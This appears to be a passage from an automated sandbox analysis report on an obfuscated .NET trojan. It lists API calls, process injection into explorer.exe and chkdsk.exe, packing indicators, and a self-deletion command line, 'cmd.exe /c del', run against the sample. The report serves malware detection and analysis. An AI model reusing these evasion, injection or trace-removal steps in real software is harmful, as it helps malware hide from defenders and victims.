          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05943D70 NtOpenThread,4_2_05943D70
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059439B0 NtGetContextThread,4_2_059439B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505A500 NtAllocateVirtualMemory,4_2_0505A500
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505A450 NtClose,4_2_0505A450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505A320 NtCreateFile,4_2_0505A320
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505A3D0 NtReadFile,4_2_0505A3D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505A44A NtReadFile,NtClose,4_2_0505A44A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505A4FB NtAllocateVirtualMemory,4_2_0505A4FB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505A31B NtCreateFile,4_2_0505A31B
          Source: 881SP1exr1.exe, 00000000.00000002.1644302616.0000000002F44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBen.dll@ vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000000.00000002.1644302616.0000000002F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBen.dll@ vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000000.00000002.1648665241.0000000007950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000000.00000002.1642627584.0000000000FCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000000.00000002.1646857743.0000000005930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBen.dll@ vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F76000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs 881SP1exr1.exe
          Source: 881SP1exr1.exe, 00000002.00000002.1701034461.000000000150D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 881SP1exr1.exe
          Source: 881SP1exr1.exeBinary or memory string: OriginalFilenameCgWC.exeF vs 881SP1exr1.exe
          Source: 881SP1exr1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 881SP1exr1.exeReversingLabs: Detection: 22%
          Source: 881SP1exr1.exeVirustotal: Detection: 34%
          Source: C:\Users\user\Desktop\881SP1exr1.exeFile read: C:\Users\user\Desktop\881SP1exr1.exe:Zone.IdentifierJump to behavior
          Source: 881SP1exr1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\881SP1exr1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exe
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\881SP1exr1.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\881SP1exr1.exeProcess created: C:\Users\user\Desktop\881SP1exr1.exe C:\Users\user\Desktop\881SP1exr1.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\881SP1exr1.exe"Jump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\881SP1exr1.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@173/1@11/10
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, QOOAOydx7dSeWpwTgP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, QOOAOydx7dSeWpwTgP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, QOOAOydx7dSeWpwTgP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.csSecurity API names: _0020.AddAccessRule
          Source: 881SP1exr1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\881SP1exr1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
          Source: C:\Users\user\Desktop\881SP1exr1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 881SP1exr1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 881SP1exr1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: 881SP1exr1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: chkdsk.pdbGCTL source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: 881SP1exr1.exe, 00000002.00000002.1700042258.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, 881SP1exr1.exe, 00000002.00000002.1699968102.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4088729224.0000000000330000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 881SP1exr1.exe, 881SP1exr1.exe, 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000004.00000003.1699296341.0000000005574000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000003.1701280255.0000000005722000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: CgWC.pdbSHA256 source: 881SP1exr1.exe
          Source: Binary string: CgWC.pdb source: 881SP1exr1.exe

          Data Obfuscation

          barindex
          Source: 881SP1exr1.exe, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: 0.2.881SP1exr1.exe.2f52da4.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.cs.Net Code: sRDWgiaYFa System.Reflection.Assembly.Load(byte[])
          Source: 0.2.881SP1exr1.exe.2f25094.2.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.cs.Net Code: sRDWgiaYFa System.Reflection.Assembly.Load(byte[])
          Source: 0.2.881SP1exr1.exe.5930000.13.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.cs.Net Code: sRDWgiaYFa System.Reflection.Assembly.Load(byte[])
          Source: 3.2.explorer.exe.1128f840.0.raw.unpack, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078D47EE push 0BDB0307h; ret 0_2_078D47FD
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078D5DAA push 2C15FF07h; iretd 0_2_078D5DAF
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078D5DBD push 2C15FF07h; iretd 0_2_078D5DC2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078DBD7D push FFFFFF8Bh; iretd 0_2_078DBD7F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078D8C05 push 8BE7EB07h; iretd 0_2_078D8C0C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 0_2_078D4A84 push 8BD08B07h; retf 0_2_078D4A89
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041E006 push dword ptr [DF23F5C2h]; ret 2_2_0041DE68
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00417953 push ebp; retf 2_2_004179C2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_004179E5 push cs; iretd 2_2_004179E6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_004169F1 push esi; ret 2_2_00416A10
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_004179FC push ebp; retf 2_2_004179C2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00416982 push esi; ret 2_2_00416A10
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_004169B9 push esi; ret 2_2_00416A10
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0040E2E1 push es; ret 2_2_0040E2E6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00417A96 pushfd ; ret 2_2_00417A97
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041D563 push dword ptr [DF23F5C2h]; ret 2_2_0041DE68
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_00406DC1 push cs; retf 2_2_00406DC4
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_004175F2 push 7C54DD51h; iretd 2_2_00417610
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041EDF5 push 00000063h; ret 2_2_0041EDF7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041DE6A push dword ptr [DF23F5C2h]; ret 2_2_0041DE68
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041EE8D push ebp; iretd 2_2_0041EE8F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_013E225F pushad ; ret 2_2_013E27F9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_013E27FA pushad ; ret 2_2_013E27F9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014109AD push ecx; mov dword ptr [esp], ecx2_2_014109B6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_013E283D push eax; iretd 2_2_013E2858
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_013E135E push eax; iretd 2_2_013E1369
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5A0000 push ss; ret 3_2_0E5A000E
          Source: 881SP1exr1.exeStatic PE information: 0x8254FD3C [Sat Apr 16 23:05:32 2039 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.915189773853943
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, iJDPmLi792wIihmm0S.csHigh entropy of concatenated method names: 'VJKA0k8Za6', 'Q21AFRlIv6', 'CDvAij9nWF', 'VHfAR34MrD', 'PUZALweoyA', 'SCUApssOA9', 'JGqADZKYeX', 'wSLAjQ5Z3l', 'X01AQoRr44', 'lQ9AZ4Z58c'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, EAjG53yMXMH4Na5kAU.csHigh entropy of concatenated method names: 'B989H70VcI', 'COp9x0nRxG', 'hFK9WN7gss', 'B0t9oKYLUo', 'AoQ9NNyd3W', 'Jl79IRqXie', 'N449lvFduj', 'J7x753gmFH', 'fQX7qsskxD', 'Ypk76bOFUc'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, Rcw6LiW7G7FubI4r8Z.csHigh entropy of concatenated method names: 'WCiHkOOAOy', 'd7dHuSeWpw', 'LN8HKPMDvg', 'eANHMMoc1s', 'k7QHAYTaO5', 'LVtHP3Q2Hj', 'yooa2WVQtOSnaaMqeb', 'ellSkGk5xZrOwP8lli', 'PVDHHN8RKK', 'r2cHxXHokp'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, yaCCP8NbceojIaVCpL.csHigh entropy of concatenated method names: 'Dispose', 'kgBH6v1p7J', 'JyO2L8TY0C', 'uM7YYaA23p', 'm8SHyibYku', 'XTLHzwQWwb', 'ProcessDialogKey', 'Jyy2OUgUbV', 'lv02HlYpTj', 'CiE22nAjG5'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, Tk6xtvZ61SwFK2ro9t.csHigh entropy of concatenated method names: 'RjnkoY2xiN', 'ytNkEX9McG', 'Pt9kll2Eeo', 'FXtly374QI', 'FKGlzLk4T1', 'X0MkOYwHuG', 'YdYkHXkLxy', 'VFAk2bnXDl', 'neYkxQ5ahu', 'aSjkW5C8Bl'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, QOOAOydx7dSeWpwTgP.csHigh entropy of concatenated method names: 'guANi823eH', 'S30NRQqdBf', 'qvDNvEoAqr', 'vaANVdliMU', 'TkuNGsiMER', 'OKDNYXCHJo', 'VYNN5MsMLo', 'qXuNq9Zksl', 'kaIN6MhxNR', 'gveNyydDd2'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, bO3xW0vMFVOE43XmPQ.csHigh entropy of concatenated method names: 'ToString', 'U0WPseRCWX', 'qkuPL9kqhZ', 'myvPpc8Ipw', 'TI1PDSEeSA', 'B6qPjd8kmR', 'xCMPQLvyII', 'vrJPZOWI3g', 'WuyP4488DZ', 'l6CPmOTroQ'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, AO5ZVtb3Q2HjxwUenm.csHigh entropy of concatenated method names: 'HSelcIgdn7', 'EZclNEWB9X', 'otGlIlc8A3', 'Ma4lkB0kdK', 'KDPlunD2AN', 'aGtIGWlOap', 'm3NIY0SSqR', 'X0TI5BhP9L', 'QwpIqFcUQK', 'NgvI6cMs5e'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, PwWgaiHx3Tv5t3uEt4D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmktiSKuJP', 'Uv7tRZZsOt', 'pcptvhUZGy', 'jsXtVHeKq6', 'nastGRum32', 'sKntYuSTWR', 'IDAt5xZbTs'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, O3yaNvmRc5AcFLPgkk.csHigh entropy of concatenated method names: 'R4hkUsHo1G', 'WTYkw0Snac', 'ATekgFNFx7', 'W6lkCInjlv', 'vGNkaYG7XN', 'vYfkenY0im', 'nNwk19trGh', 'dAMkdr0ile', 'zfxkn3AFGf', 'rankrJlK9b'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, y8h2NmHHHyiSIqBFoH2.csHigh entropy of concatenated method names: 'ToString', 'E2Ptx75jpa', 'bUktWEOxjL', 'uBytc6bthg', 'L8EtoywfwS', 'xFPtNCpBEd', 'zwRtEjDYXk', 'aXbtIRCb9I', 'bsPllC1OKFiJYYu3Vnp', 'BNESyR1quKQ5Ro84mhM'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, B16NMlTDV9sA6BMlFA.csHigh entropy of concatenated method names: 'mIuBd0JMIZ', 'Q80Bn0TSRr', 'o03Bbg5JXf', 'GJLBLVjHUH', 'IxjBDgUDrK', 'SX0Bj4lxLC', 'TYsBZpPqB1', 'odpB4IPBaW', 'csXB0Wvpun', 'AkTBss4OO4'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, pEtVi5z346glyXaolq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MgU9BE1qKF', 'TNy9AE0u0p', 'PIn9P7p401', 'wfU9Xp5x28', 'Jds97v8wJk', 'h1e99wJ4gP', 't7m9t0Qa3p'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, YUgUbV63v0lYpTjeiE.csHigh entropy of concatenated method names: 'wDR7bfyxwG', 'xQg7LSZ8C0', 'yaP7pYweyC', 'rUI7DY78WN', 'B9P7iVFOh3', 'LSw7jPx3vp', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, wSibYkqu6TLwQWwbjy.csHigh entropy of concatenated method names: 'Nij7obiGFa', 'GkH7NIPPFO', 'HE37EsBO9l', 'GSQ7IDC6NI', 'sgs7ly1ZMN', 'sa27kf9jnc', 'BeB7uFJyWH', 'KB473jR4dC', 'Gnv7KfKcDj', 'GeZ7M3ikOX'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, xQMMR4HOvDpBWHNtOVk.csHigh entropy of concatenated method names: 'b3q9U7Jj9T', 'DUW9wUDTTw', 'HRf9gWXGDq', 'bS79CrxOR1', 'q1s9a6vVdX', 'yaJ9evGlCt', 'raL91Qhitp', 'Wit9djHCHm', 'tli9nCc5an', 'jqX9rOkyVG'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, fc1syvrZC5gZWu7QYT.csHigh entropy of concatenated method names: 'GMFIaCAIPd', 'og6I1VhrPp', 'EFjEpCppb0', 'Nu3ED2gjxU', 'mWrEjvPoNg', 'JRoEQUCYYc', 'nvPEZvAc4o', 'DsQE45QQVf', 'UHoEmSJG3k', 'nHaE0MBB73'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, UChBqsYrpZQR7u9Ord.csHigh entropy of concatenated method names: 'nZaXqUAXhT', 'TVVXywLpf6', 'LWo7OE8HaX', 'RMh7HvTKFR', 'mrfXsjV1OL', 'MbXXFSb60a', 'HGcXTnWFHN', 'xfpXiWJvZg', 'xarXRZXfPS', 'NRWXvRwBAK'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.csHigh entropy of concatenated method names: 'MAIxcjatDr', 'zvnxositx7', 'QpQxNVhjM1', 'EiYxEL0R5D', 'KqqxIaGDAA', 'mKoxlANCXt', 'yKXxkWJSmc', 'Bbaxu5tl8T', 'tCEx3crQI9', 'fUYxKdtLj5'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, Wa22wZnN8PMDvgWANM.csHigh entropy of concatenated method names: 'HUaECJtMj9', 'JYXEeOrnLm', 'bkWEdc5eBe', 'xDJEnUpRiW', 'V1fEABq4MD', 'v12EP3NUxQ', 'YcPEXcnyl2', 'aOqE78s67t', 'qR5E929JUE', 'L1gEtAqawS'
          Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, gsGG9h2imcMQk8g6VW.csHigh entropy of concatenated method names: 'UapgT2uMV', 'IuECQx031', 'v5UeTdbtp', 'tEX1UxyY7', 'eR7nrflTg', 'dvBrgVHn6', 'GqCeqf6JDQgx3fxcYF', 'LP5QGNRwBMrSI9vWjh', 'MRi7OrDB0', 'vEXtk1uaY'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, iJDPmLi792wIihmm0S.csHigh entropy of concatenated method names: 'VJKA0k8Za6', 'Q21AFRlIv6', 'CDvAij9nWF', 'VHfAR34MrD', 'PUZALweoyA', 'SCUApssOA9', 'JGqADZKYeX', 'wSLAjQ5Z3l', 'X01AQoRr44', 'lQ9AZ4Z58c'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, EAjG53yMXMH4Na5kAU.csHigh entropy of concatenated method names: 'B989H70VcI', 'COp9x0nRxG', 'hFK9WN7gss', 'B0t9oKYLUo', 'AoQ9NNyd3W', 'Jl79IRqXie', 'N449lvFduj', 'J7x753gmFH', 'fQX7qsskxD', 'Ypk76bOFUc'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, Rcw6LiW7G7FubI4r8Z.csHigh entropy of concatenated method names: 'WCiHkOOAOy', 'd7dHuSeWpw', 'LN8HKPMDvg', 'eANHMMoc1s', 'k7QHAYTaO5', 'LVtHP3Q2Hj', 'yooa2WVQtOSnaaMqeb', 'ellSkGk5xZrOwP8lli', 'PVDHHN8RKK', 'r2cHxXHokp'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, yaCCP8NbceojIaVCpL.csHigh entropy of concatenated method names: 'Dispose', 'kgBH6v1p7J', 'JyO2L8TY0C', 'uM7YYaA23p', 'm8SHyibYku', 'XTLHzwQWwb', 'ProcessDialogKey', 'Jyy2OUgUbV', 'lv02HlYpTj', 'CiE22nAjG5'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, Tk6xtvZ61SwFK2ro9t.csHigh entropy of concatenated method names: 'RjnkoY2xiN', 'ytNkEX9McG', 'Pt9kll2Eeo', 'FXtly374QI', 'FKGlzLk4T1', 'X0MkOYwHuG', 'YdYkHXkLxy', 'VFAk2bnXDl', 'neYkxQ5ahu', 'aSjkW5C8Bl'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, QOOAOydx7dSeWpwTgP.csHigh entropy of concatenated method names: 'guANi823eH', 'S30NRQqdBf', 'qvDNvEoAqr', 'vaANVdliMU', 'TkuNGsiMER', 'OKDNYXCHJo', 'VYNN5MsMLo', 'qXuNq9Zksl', 'kaIN6MhxNR', 'gveNyydDd2'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, bO3xW0vMFVOE43XmPQ.csHigh entropy of concatenated method names: 'ToString', 'U0WPseRCWX', 'qkuPL9kqhZ', 'myvPpc8Ipw', 'TI1PDSEeSA', 'B6qPjd8kmR', 'xCMPQLvyII', 'vrJPZOWI3g', 'WuyP4488DZ', 'l6CPmOTroQ'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, AO5ZVtb3Q2HjxwUenm.csHigh entropy of concatenated method names: 'HSelcIgdn7', 'EZclNEWB9X', 'otGlIlc8A3', 'Ma4lkB0kdK', 'KDPlunD2AN', 'aGtIGWlOap', 'm3NIY0SSqR', 'X0TI5BhP9L', 'QwpIqFcUQK', 'NgvI6cMs5e'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, PwWgaiHx3Tv5t3uEt4D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmktiSKuJP', 'Uv7tRZZsOt', 'pcptvhUZGy', 'jsXtVHeKq6', 'nastGRum32', 'sKntYuSTWR', 'IDAt5xZbTs'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, O3yaNvmRc5AcFLPgkk.csHigh entropy of concatenated method names: 'R4hkUsHo1G', 'WTYkw0Snac', 'ATekgFNFx7', 'W6lkCInjlv', 'vGNkaYG7XN', 'vYfkenY0im', 'nNwk19trGh', 'dAMkdr0ile', 'zfxkn3AFGf', 'rankrJlK9b'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, y8h2NmHHHyiSIqBFoH2.csHigh entropy of concatenated method names: 'ToString', 'E2Ptx75jpa', 'bUktWEOxjL', 'uBytc6bthg', 'L8EtoywfwS', 'xFPtNCpBEd', 'zwRtEjDYXk', 'aXbtIRCb9I', 'bsPllC1OKFiJYYu3Vnp', 'BNESyR1quKQ5Ro84mhM'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, B16NMlTDV9sA6BMlFA.csHigh entropy of concatenated method names: 'mIuBd0JMIZ', 'Q80Bn0TSRr', 'o03Bbg5JXf', 'GJLBLVjHUH', 'IxjBDgUDrK', 'SX0Bj4lxLC', 'TYsBZpPqB1', 'odpB4IPBaW', 'csXB0Wvpun', 'AkTBss4OO4'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, pEtVi5z346glyXaolq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MgU9BE1qKF', 'TNy9AE0u0p', 'PIn9P7p401', 'wfU9Xp5x28', 'Jds97v8wJk', 'h1e99wJ4gP', 't7m9t0Qa3p'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, YUgUbV63v0lYpTjeiE.csHigh entropy of concatenated method names: 'wDR7bfyxwG', 'xQg7LSZ8C0', 'yaP7pYweyC', 'rUI7DY78WN', 'B9P7iVFOh3', 'LSw7jPx3vp', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, wSibYkqu6TLwQWwbjy.csHigh entropy of concatenated method names: 'Nij7obiGFa', 'GkH7NIPPFO', 'HE37EsBO9l', 'GSQ7IDC6NI', 'sgs7ly1ZMN', 'sa27kf9jnc', 'BeB7uFJyWH', 'KB473jR4dC', 'Gnv7KfKcDj', 'GeZ7M3ikOX'
          Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, xQMMR4HOvDpBWHNtOVk.csHigh entropy of concatenated method names: 'b3q9U7Jj9T', 'DUW9wUDTTw', 'HRf9gWXGDq', 'bS79CrxOR1', 'q1s9a6vVdX', 'yaJ9evGlCt', 'raL91Qhitp', 'Wit9djHCHm', 'tli9nCc5an', 'jqX9rOkyVG'
